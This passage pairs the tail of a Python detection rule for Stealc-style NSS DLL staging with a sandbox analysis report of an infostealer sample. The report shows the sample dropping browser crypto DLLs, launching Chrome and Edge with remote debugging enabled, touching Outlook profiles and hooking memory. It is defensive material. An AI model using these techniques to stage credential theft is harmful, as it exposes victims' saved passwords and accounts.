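        s = state[ev["pid"]]
        s["image"] = ev["image"]
        if ev["event"] == "file_create":
            name = basename(ev["target"])
            if name in NSS_DEPENDENCIES:
                s["dlls"].add(name)
        elif ev["event"] == "network" and IP_LITERAL_URL.match(ev["url"]):
            url = ev["url"]
            if url.lower().endswith(".dll"):
                s["dll_urls"].add(url)
            elif url.lower().endswith(".php"):
                s["gates"].add(url)
    alerts = []
    for pid, s in sorted(state.items()):
        if basename(s["image"]) in ALLOWED_WRITERS or len(s["dlls"]) < min_dlls:
            continue
        severity = "high" if (s["dll_urls"] or s["gates"]) else "medium"
        alerts.append({"pid": pid, "image": s["image"], "severity": severity,
                       "dlls": sorted(s["dlls"]), "dll_urls": sorted(s["dll_urls"]),
                       "gates": sorted(s["gates"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_nss_staging(EVENTS):
        print(alert)
```

The DLL-drop count alone is the low-confidence signal (installers do write vcruntime140.dll), so the rule keys on two or more NSS-family names from one process and lets the IP-literal download or gate request promote the finding; tune `min_dlls` and the allowlist against your own installer telemetry before deploying.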

System Summary

Source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C9EB700
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C9EB8C0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C9EB910
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C98F280
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9835A0 0_2_6C9835A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C996C80 0_2_6C996C80
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E34A0 0_2_6C9E34A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EC4A0 0_2_6C9EC4A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AD4D0 0_2_6C9AD4D0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9964C0 0_2_6C9964C0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C6CF0 0_2_6C9C6CF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98D4E0 0_2_6C98D4E0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C5C10 0_2_6C9C5C10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D2C10 0_2_6C9D2C10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9FAC00 0_2_6C9FAC00
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F542B 0_2_6C9F542B
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F545C 0_2_6C9F545C
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C995440 0_2_6C995440
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C0DD0 0_2_6C9C0DD0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E85F0 0_2_6C9E85F0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B0512 0_2_6C9B0512
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AED10 0_2_6C9AED10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99FD00 0_2_6C99FD00
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A5E90 0_2_6C9A5E90
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9EE680 0_2_6C9EE680
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E4EA0 0_2_6C9E4EA0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98BEF0 0_2_6C98BEF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99FEF0 0_2_6C99FEF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F76E3 0_2_6C9F76E3
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C7E10 0_2_6C9C7E10
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D5600 0_2_6C9D5600
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E9E30 0_2_6C9E9E30
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A9E50 0_2_6C9A9E50
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C3E50 0_2_6C9C3E50
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D2E4E 0_2_6C9D2E4E
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A4640 0_2_6C9A4640
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98C670 0_2_6C98C670
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F6E63 0_2_6C9F6E63
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D77A0 0_2_6C9D77A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B6FF0 0_2_6C9B6FF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98DFE0 0_2_6C98DFE0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C7710 0_2_6C9C7710
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C999F00 0_2_6C999F00
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B60A0 0_2_6C9B60A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F50C7 0_2_6C9F50C7
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AC0E0 0_2_6C9AC0E0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C58E0 0_2_6C9C58E0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C997810 0_2_6C997810
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CB820 0_2_6C9CB820
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9D4820 0_2_6C9D4820
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A8850 0_2_6C9A8850
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AD850 0_2_6C9AD850
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CF070 0_2_6C9CF070
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C5190 0_2_6C9C5190
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E2990 0_2_6C9E2990
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BD9B0 0_2_6C9BD9B0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98C9A0 0_2_6C98C9A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9AA940 0_2_6C9AA940
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9DB970 0_2_6C9DB970
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9FB170 0_2_6C9FB170
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99D960 0_2_6C99D960
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9FBA90 0_2_6C9FBA90
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99CAB0 0_2_6C99CAB0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F2AB0 0_2_6C9F2AB0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9822A0 0_2_6C9822A0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9B4AA0 0_2_6C9B4AA0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C8AC0 0_2_6C9C8AC0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9A1AF0 0_2_6C9A1AF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CE2F0 0_2_6C9CE2F0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9C9A60 0_2_6C9C9A60
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C98F380 0_2_6C98F380
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9F53C8 0_2_6C9F53C8
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9CD320 0_2_6C9CD320
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C985340 0_2_6C985340
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99C370 0_2_6C99C370
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: String function: 6C9C94D0 appears 90 times
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: String function: 6C9BCBE8 appears 134 times
Source: gYjK72gL17.exe Static PE information: invalid certificate
Source: gYjK72gL17.exe, 00000000.00000002.2614193675.000000006CC25000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs gYjK72gL17.exe
Source: gYjK72gL17.exe, 00000000.00000002.2613919289.000000006CA12000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs gYjK72gL17.exe
Source: gYjK72gL17.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@28/48@4/5
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C9E7030
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\3KC1D7XT.htm Jump to behavior
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: gYjK72gL17.exe, 00000000.00000003.2439812181.0000000009AED000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000003.2303794092.0000000009AFB000.00000004.00000020.00020000.00000000.sdmp, EGDGIIJJECFIDHJJKKFC.0.dr, GCGHJEBGHJKEBFHIJDHC.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: gYjK72gL17.exe, 00000000.00000002.2613667982.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: gYjK72gL17.exe ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Users\user\Desktop\gYjK72gL17.exe "C:\Users\user\Desktop\gYjK72gL17.exe"
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2324,i,1475862429204762952,15165259420851730460,262144 /prefetch:8
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2320,i,3391580961989094564,10660087592265685708,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2188,i,279746520434431833,257325066205650014,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: gYjK72gL17.exe Static file information: File size 5820392 > 1048576
Source: gYjK72gL17.exe Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x497400
Source: gYjK72gL17.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: gYjK72gL17.exe, 00000000.00000002.2614092949.000000006CBDF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C983480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C983480
Source: initial sample Static PE information: section where entry point is pointing to: .vmp
Source: gYjK72gL17.exe Static PE information: section name: .vmp
Source: gYjK72gL17.exe Static PE information: section name: .vmp
Source: gYjK72gL17.exe Static PE information: section name: .vmp
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB536 push ecx; ret 0_2_6C9BB549
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\gYjK72gL17.exe Memory written: PID: 4512 base: 13D0005 value: E9 8B 2F FB 75
Source: C:\Users\user\Desktop\gYjK72gL17.exe Memory written: PID: 4512 base: 77382F90 value: E9 7A D0 04 8A
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C9E55F0

